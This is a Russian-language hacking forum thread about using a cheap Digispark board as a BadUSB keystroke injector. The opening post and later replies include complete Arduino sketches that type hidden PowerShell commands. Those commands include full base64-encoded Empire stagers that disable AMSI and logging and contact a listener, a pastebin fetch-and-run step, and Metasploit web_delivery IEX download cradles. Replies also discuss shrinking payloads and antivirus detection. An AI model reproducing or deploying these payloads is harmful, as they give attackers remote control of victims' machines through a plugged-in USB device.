Статья Digispark - badusb за 1$

Dr.Lafa

Dr.Lafa

Mod. Hardware
Grey Team
30.12.2016
510
1 044
Хочу рассказать о младшем (возможно даже отсталом и ущербном) брате Rubber Ducky - DigiSpark.

IMG_20170826_153239.jpg


Стоит эта приблуда 1$ во всем известном Китайском интернет-магазине.
Что-ж, какова цена - таковы и возможности. За такую скромную сумму мы имеем:
  1. 8 кб памяти для вашего кода, 2 из которых съедает загрузчик.
  2. Небольшую документацию:
О том, как настроить окружение можно прочитать здесь:

Что же по поводу bad usb? Digi позволяет эмулировать клавиатуру, что даёт нам возможность создать powershell-backdoor. Приступим.

Генерация пейлоада

Генерировать буду с помощью Empire.
Код:
sudo ./empire
listeners
uselistener http
Что бы посмотреть все возможные варианты - после uselistener 2 раза нажмите Tab

_ _ _ 2017-08-31 22-38-26.png


Устанавливаем имя, порт, и запускаем листенер.

_ _ _ 2017-08-31 22-38-44.png


Получаем наш powershell-payload
launcher powershell Digi

_ _ _ 2017-08-31 22-39-49.png


Пишем код

Вся структура кода выглядит так:
Код:
#include "DigiKeyboard.h" // Импортируем модуль клавиатуры

void setup()
{
  // Одноразовое выполнение кода
}

void loop()
{
  // Циклическое выполнение кода            
}
Основа будет выполняться один раз. При тестировании возникла проблема переключения раскладки, но опытным путём выяснилось, что на русифицированной windows 7 все новые окна по умолчанию открываются с русской раскладкой. В таком случае код будет выглядеть так:
Код:
#include "DigiKeyboard.h"
#define KEY_ALT         226   // Кнопка left Alt
#define KEY_SHIFT       A0    // Кнопка left Shift

void setup()
{
  DigiKeyboard.update();
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(2000);   // Время простоя в миллисекундах

  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // Открываем поиск
  DigiKeyboard.delay(2000);

  DigiKeyboard.sendKeyStroke(KEY_ALT, KEY_SHIFT); // Переводим раскладку на английску
  DigiKeyboard.delay(2000);

  DigiKeyboard.println("cmd.exe");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(2000);

  DigiKeyboard.sendKeyStroke(KEY_ALT, KEY_SHIFT); // Переводим раскладку на английский
  DigiKeyboard.delay(2000);

  DigiKeyboard.println("powershell -noP -sta -w 1 -enc  JABHAHIAbwB1AFAAUABvAGwAaQBjAFkAUwBFAHQAdABpAG4ARwBTACAAPQAgAFsAcgBFAGYAXQAuAEEAUwBzAGUAbQBCAEwAeQAuAEcAZQB0AFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAGkARQBgAEwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAgACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBHAEUAdABWAEEAbAB1AEUAKAAkAG4AVQBMAEwAKQA7ACQARwBSAG8AVQBwAFAAbwBsAEkAYwB5AFMARQBUAHQASQBuAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AIAA9ACAAMAA7ACQARwByAG8AVQBwAFAAbwBsAGkAQwB5AFMARQBUAHQAaQBuAEcAcwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQAgAD0AIAAwADsAWwBSAGUARgBdAC4AQQBTAHMAZQBNAGIATABZAC4ARwBlAHQAVABZAHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAdABGAGkAZQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQB0AFYAQQBsAHUAZQAoACQATgB1AEwATAAsACQAVABSAHUAZQApAH0AOwBbAFMAWQBTAFQARQBtAC4ATgBlAFQALgBTAEUAUgBWAEkAYwBFAFAAbwBpAE4AVABNAGEAbgBhAGcAZQBSAF0AOgA6AEUAeABwAEUAQwBUADEAMAAwAEMATwBOAHQASQBOAHUARQA9ADAAOwAkAHcAQwA9AE4AZQB3AC0ATwBiAGoAZQBDAFQAIABTAHkAUwBUAEUATQAuAE4ARQB0AC4AVwBFAEIAQwBsAEkARQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AEMALgBIAEUAQQBEAEUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAGMALgBQAFIATwB4AFkAPQBbAFMAWQBTAHQARQBtAC4ATgBlAHQALgBXAGUAQgBSAGUAUQB1AEUAUwBUAF0AOgA6AEQAZQBGAGEAVQBMAHQAVwBlAGIAUABSAG8AeABZADsAJAB3AGMALgBQAFIATwBYAHkALgBDAFIARQBEAEUATgB0AEkAYQBMAHMAIAA9ACAAWwBTAHkAUwBUAEUATQAuAE4AZQB0AC4AQwByAGUARABlAG4AVABpAEEAbABDAGEAYwBIAEUAXQA6ADoARABFAGYAYQB1AEwAdABOAGUAVAB3AE8AUgBrAEMAcgBlAGQARQBOAHQAaQBhAEwAcwA7ACQASwA9AFsAUwB5AFMAVABlAG0ALgBUAGUAeABUAC4ARQBOAEMATwBEAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAWQB0AEUAcwAoACcANwBiADIANABhAGYAYwA4AGIAYwA4ADAAZQA1ADQAOABkADYANgBjADQAZQA3AGYAZgA3ADIAMQA3ADEAYwA1ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABlAEEARABlAFIAcwAuAEEARABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AeABLAEYARQBIAEkAYwBSAEgAcgBvAGkAdAB1AG8AWQB6ADgARgBaAG0AOQA1AEwATwBkADAAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAwAC4AMQAwADIAOgAxADMAMwA3ACcAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkAGQAYQB0AEEAPQAkAFcAQwAuAEQAbwBXAE4ATABvAGEARABEAEEAVABhACgAJABTAEUAcgArACQAdAApADsAJABJAHYAPQAkAEQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQBUAEEAPQAkAEQAYQB0AGEAWwA0AC4ALgAkAEQAYQBUAGEALgBsAGUATgBHAFQASABdADsALQBqAE8AaQBOAFsAQwBoAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAQQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA=="); // Полезная нагрузка
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
}

void loop()
{
  digitalWrite(0, HIGH);
  digitalWrite(1, HIGH);    // Мигалка светодиода
  delay(100);               // по окончанию
  digitalWrite(0, HIGH);    // скрипта
  digitalWrite(1, HIGH);
  delay(100);       
}
Компилируем ии... Получаем ошибку. Памяти на столько мало, что не хватает даже на powershell-backdoor!

_ _ _ 2017-08-31 22-44-21.png


Можно попробовать вставить payload, сгенерированный в msfvenom с функцией --smallest, либо найти нагрузку меньше, но это вы можете сделать сами, я же покажу второй вариант.

Обходной путь

В powershell версии 3.0 и выше (начиная с windows 8) появилась функция Invoke-WebRequest, которая позволяет парсить сайты. Воспользуемся ей.
Для этого заливаем свой пейлоад на pastebin:

__001.png


Вместо прямого использования нагрузки спарсим его:
Код:
#include "DigiKeyboard.h"

#define KEY_ALT         226   // Кнопка left Alt
#define KEY_SHIFT       A0    // Кнопка left Shift

void setup()
{
  DigiKeyboard.update();
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(2000);   // Время простоя в миллисекундах

  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(2000);

  DigiKeyboard.sendKeyStroke(KEY_ALT, KEY_SHIFT);
  DigiKeyboard.delay(2000);

  DigiKeyboard.println("cmd.exe");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(2000);

  DigiKeyboard.sendKeyStroke(KEY_ALT, KEY_SHIFT);
  DigiKeyboard.delay(2000);

  DigiKeyboard.println("powershell");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(2000);

  DigiKeyboard.println("$url = 'pastebin.com/tA76vf4A'");  // Ссылка на пейлоад на пастбин
  delay(50);
  DigiKeyboard.println("$result = Invoke-WebRequest -Uri $url");
  delay(50);
  DigiKeyboard.println("powershell.exe -nop -e $result.content");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
}

void loop()
{
  digitalWrite(0, HIGH);
  digitalWrite(1, HIGH);    // Мигалка светодиода
  delay(100);               // по окончанию
  digitalWrite(0, HIGH);    // скрипта
  digitalWrite(1, HIGH);
  delay(100);              
}
Теперь код занимает только 54% памяти.

_ _ _ 2017-08-31 23-27-06.png


Вонзив этот корявый клинок правосудия в usb-разъём жертвы вашего компьютера, выполнится ваш код на C. Не плохой потенциал, но вряд ли 6 кб памяти дадут вам его реализовать...


Выводы

Хорошая игрушка за свои деньги, не более. Будь там хотя бы 16 кб памяти - можно было бы использовать нормальные бекдор без костылей, которые работают только на windows 8 и выше.
Можно, конечно, попробовать скачивать нужные для выполнения программы с помощью чистого C++, но я не силён в нём. Либо просто воровать кукисы, но не то время нынче...

Эх, было время, когда можно было взломать аккаунт вк или однокласников обычной подменой кукисов...
 
ghostphisher

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 535
3 379
Добрая статья!

Думаю ей самое место для участие в колнкурсе, но для этого ее надо оформить по правилам - cтатья должна содержать в названии слово -> КОНКУРС название статьи, в шапке темы СТАТЬЯ ДЛЯ КОНКУРСА 01.09 - 30.09

пример: КОНКУРС. Digispark - badusb за 1$
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
3 019
Хотел так же написать про него. Хорошая штука.
Единственная проблема на Windows 10 проблема с драйверами , не распознает устройство, а так в целом работает отлично. Заказал себе ещё 5 шт. Что бы каждая под определенные ситуации. Одна под Винду с руской раскладкой,один под Линукс,один под Винду с англ расскладкой ,один для подключения к эвил вай фай сети , и одну для раздачи вай фай сети с ноута.
Профит за 5$ получаем 5 USB rubber ducker )))
 
D

Dmitry88

В Про версии 16кб, а так же заявлена поддержка "We also provide libraries for the Pro to emulate a USB Keyboard, Mouse, Joystick, or Generic HID Device" , но минус - разъем микроusb. можно с помощью переходника можно сделать "нормальный usb". Радость эта стоит аж 3 доллара.
 
Dr.Lafa

Dr.Lafa

Mod. Hardware
Grey Team
30.12.2016
510
1 044
В Про версии 16кб, а так же заявлена поддержка "We also provide libraries for the Pro to emulate a USB Keyboard, Mouse, Joystick, or Generic HID Device" , но минус - разъем микроusb. можно с помощью переходника можно сделать "нормальный usb". Радость эта стоит аж 3 доллара.
А это действительно полезная для меня информация. Спасибо:)
[doublepost=1504250385,1504250336][/doublepost]
Добрая статья!

Думаю ей самое место для участие в колнкурсе, но для этого ее надо оформить по правилам - cтатья должна содержать в названии слово -> КОНКУРС название статьи, в шапке темы СТАТЬЯ ДЛЯ КОНКУРСА 01.09 - 30.09

пример: КОНКУРС. Digispark - badusb за 1$
Думаю, для конкурса будет что получще, это для общего развития
 
PenGenKiddy

PenGenKiddy

Active member
28.07.2017
30
58
Не знаю, как у вас, но я юзаю STM32 с просмотром сообщений DM, при помощи чего определяю ось, а потом уже качу пейлоуд, кстати, можно при помощи USBNet (Эмуляции USB модема) митмить сразу в память STM, а так-же грабить приват ключи к беспроводным HID устройствам &_&
 
  • Нравится
Реакции: 9kopb и Dr.Lafa
PenGenKiddy

PenGenKiddy

Active member
28.07.2017
30
58
спасибо за инфу, теперь всю ночь гуглить:)
Я юзаю: Отладочную плату на базе 32-битного микроконтроллера STM32F103C8T6
Характеристики:
  • Flash память: 64К
  • RAM: 20K
  • 37 портов ввода/вывода
  • SPI, I2C, UART
  • Тактовая частота: 72 МГц

Определять ось можно при помощи эмуляции USB и чека autorun (Win зырит autorun.ini/desktop.ini, Lin - autorun.sh, MAC - ds_store), или смотря очередность запросов к USB
[doublepost=1504388202,1504388137][/doublepost]Но это упуская детали)
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
3 019
Сейчас собираю материал по pi zero .
Планирую купить, если никто не опередит со статьей то опишу опыт тестирования.
 
Dr.Lafa

Dr.Lafa

Mod. Hardware
Grey Team
30.12.2016
510
1 044
Появилась ещё обнадёживающая идея попробовать Digispark + Metasploit Web-delivery. Он, кажется, работал под windows 7 и пейлоад был довольно небольшой (в сравнении с empire или unicorn).
Проверю при свободном времени.
 
PenGenKiddy

PenGenKiddy

Active member
28.07.2017
30
58
Появилась ещё обнадёживающая идея попробовать Digispark + Metasploit Web-delivery. Он, кажется, работал под windows 7 и пейлоад был довольно небольшой (в сравнении с empire или unicorn).
Проверю при свободном времени.
Кстати под Mac OS Digispark не отрабатывает (Может только у меня), хз почему
 
Dr.Lafa

Dr.Lafa

Mod. Hardware
Grey Team
30.12.2016
510
1 044
Дааа, Metasploit web-delivery отлично вмещается в Digispark! В моём случае это заняло 56% памяти.
Так что же нужно:
1. Сделать пейлоад
Код:
msfconsole

use exploit/multi/script/web_delivery
use payload windows/x64/meterpreter/reverse_tcp
set srvhost 192.168.0.102 (ip пентестера)
set lhost 192.168.0.102 (ip пентестера)
exploit
Получаем пейлоад вроде такого:
Код:
powershell.exe -nop -w hidden -c $q=new-object net.webclient;$q.proxy=[Net.WebRequest]::GetSystemWebProxy();$q.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $q.downloadstring('http://192.168.0.102:8080/I1oPQAzHmpM');
3. Пихаем пейлоад в Digispark-компилятор (В моём случае, когда в новом окне раскладка по дефолту сменяется на русский, код такой):
Код:
#include "DigiKeyboard.h"

void setup()
{
  DigiKeyboard.update();
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(2000);
 
  //DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT); //5B
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(2000);
 
  DigiKeyboard.sendKeyStroke(226, A0);
  DigiKeyboard.delay(2000);

  DigiKeyboard.println("cmd.exe");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(2000);
 
  DigiKeyboard.sendKeyStroke(226, A0);
  DigiKeyboard.delay(2000);
 
  DigiKeyboard.println("powershell.exe -nop -w hidden -c $q=new-object net.webclient;$q.proxy=[Net.WebRequest]::GetSystemWebProxy();$q.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $q.downloadstring('http://192.168.0.102:8080/I1oPQAzHmpM');"); // Metasploit web-delivery
}

void loop()
{
  digitalWrite(0, HIGH);
  digitalWrite(1, HIGH);
  delay(500);           
  digitalWrite(0, HIGH);
  digitalWrite(1, HIGH);
  delay(500);            
}
4. web-delivery пейлоад палится касперским(лицензия), так что пришлось вырубать его:confused:
 
WinCent

WinCent

Member
12.05.2017
8
11
У меня есть в планах сделать hand-made rubber ducky. В основе будет просто контроллер от обычной USB-клавиатуры и Atmega128(128kb), которая будет имитировать нажатия клавиш. Пока что работаю над принципиальной схемой и прошивкой, так что ждите в скором статью на эту тему)
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
3 019
Получаем пейлоад вроде такого:
Код:
powershell.exe -nop -w hidden -c $q=new-object net.webclient;$q.proxy=[Net.WebRequest]::GetSystemWebProxy();$q.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $q.downloadstring('http://192.168.0.102:8080/I1oPQAzHmpM');
$q.proxy=[Net.WebRequest]::GetSystemWebProxy();$q.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials; --Это можно спокойно убирать из запроса для экономии памяти... , работает и без него )
 
  • Нравится
Реакции: Dr.Lafa
D

Dmitry88

Сейчас собираю материал по pi zero .
Планирую купить, если никто не опередит со статьей то опишу опыт тестирования.
Интересно будет почитать.
OFFTOP: Правда Pi zero днем с огнем не найти. Еще полгода назад хотел заказать - но везде закончились. Исключения - барыги , перепродававшие его за 40$
Хотел перейти на апельсин, но он очень сырой в плане софта и драйверов. Пока решил воздержаться.
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
3 019
Интересно будет почитать.
OFFTOP: Правда Pi zero днем с огнем не найти. Еще полгода назад хотел заказать - но везде закончились. Исключения - барыги , перепродававшие его за 40$
Хотел перейти на апельсин, но он очень сырой в плане софта и драйверов. Пока решил воздержаться.
С этим увы, да, проблемно. Нашел у себя в стране в пределах 15-20$
 
Dr.Lafa

Dr.Lafa

Mod. Hardware
Grey Team
30.12.2016
510
1 044
$q.proxy=[Net.WebRequest]::GetSystemWebProxy();$q.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials; --Это можно спокойно убирать из запроса для экономии памяти... , работает и без него )
Жаль конечно, но теперь и powershell-скриптинг (если его можно атк назвать) и даже обычный планировщик задач хорошо палится АВ.

Вот так каспер палит web-delivery:

А именно эту команду
Код:
powershell.exe -nop -w hidden IEX (New-Object Net.WebClient).downloadstring('http://bit.ly/2xLBaKf');
upload_2017-9-5_13-48-40.png

Которая доставляет этот вредонос:
Код:
powershell -noP -sta -w 1 -enc  JABHAFIATwBVAFAAUABvAEwAaQBDAHkAUwBlAHQAdABpAE4AZwBTACAAPQAgAFsAUgBlAEYAXQAuAEEAUwBTAEUAbQBiAGwAWQAuAEcARQBUAFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAgACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBHAGUAdABWAGEATABVAEUAKAAkAG4AdQBsAGwAKQA7ACQARwBSAG8AdQBQAFAAbwBsAGkAYwB5AFMARQBUAHQASQBuAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AIAA9ACAAMAA7ACQARwByAG8AVQBQAFAAbwBsAEkAQwB5AFMAZQB0AFQAaQBOAGcAcwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQAgAD0AIAAwADsAWwBSAGUAZgBdAC4AQQBTAFMAZQBNAGIATAB5AC4ARwBFAFQAVABZAFAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAdABGAEkARQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBsAFUAZQAoACQAbgB1AEwATAAsACQAVAByAFUAZQApAH0AOwBbAFMAeQBzAHQARQBNAC4ATgBFAHQALgBTAGUAcgB2AGkAYwBFAFAATwBpAG4AVABNAEEATgBBAGcAZQByAF0AOgA6AEUAeABwAEUAQwBUADEAMAAwAEMATwBOAFQAaQBuAHUAZQA9ADAAOwAkAFcAYwA9AE4ARQB3AC0ATwBiAGoAZQBDAFQAIABTAFkAcwB0AGUATQAuAE4AZQB0AC4AVwBlAEIAQwBMAEkARQBOAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AGMALgBIAEUAQQBEAEUAUgBTAC4AQQBEAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAEMALgBQAHIATwBYAHkAPQBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBXAGUAQgBSAEUAcQB1AGUAcwBUAF0AOgA6AEQAZQBmAGEAdQBsAFQAVwBFAGIAUABSAE8AeAB5ADsAJABXAGMALgBQAFIAbwB4AHkALgBDAHIAZQBEAEUATgBUAEkAYQBMAHMAIAA9ACAAWwBTAFkAUwBUAEUAbQAuAE4AZQBUAC4AQwByAGUAZABlAG4AVABJAEEATABDAEEAYwBIAEUAXQA6ADoARABlAGYAQQBVAGwAVABOAGUAVAB3AG8AUgBLAEMAUgBlAEQARQBOAFQAaQBhAGwAUwA7ACQASwA9AFsAUwB5AHMAVABFAG0ALgBUAEUAeAB0AC4ARQBuAEMAbwBEAEkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcARQBUAEIAWQBUAEUAUwAoACcAUwAwACsAdAA5AHgASQBYACEAcQAxAGcASAA+AGMAWgBoAE0ALQA8AEIARwBLAGoAdgA6ADQAQAAjAE4AewB8ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAWABvAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABFAGEAZABFAHIAcwAuAEEAZABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AVQBzAEIAWABpADgAbQBvAE4AUQBRAC8ARwBjADAAMQBYAE0ASgBjAE4AMQA1AFYAZgBpAE0APQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAwAC4AMQAwADIAOgAxADMAMwA3ACcAOwAkAHQAPQAnAC8AbABvAGcAaQBuAC8AcAByAG8AYwBlAHMAcwAuAHAAaABwACcAOwAkAGQAQQBUAEEAPQAkAFcAQwAuAEQATwBXAG4ATABvAGEARABEAEEAVABhACgAJABTAGUAUgArACQAdAApADsAJABpAHYAPQAkAEQAQQBUAGEAWwAwAC4ALgAzAF0AOwAkAEQAYQBUAEEAPQAkAGQAQQBUAEEAWwA0AC4ALgAkAEQAQQBUAGEALgBsAEUAbgBnAFQAaABdADsALQBqAG8ASQBOAFsAQwBIAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAQQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
Хотя возможно палится не метод, а сам Empire-powershell пейлоад
 
Мы в соцсетях: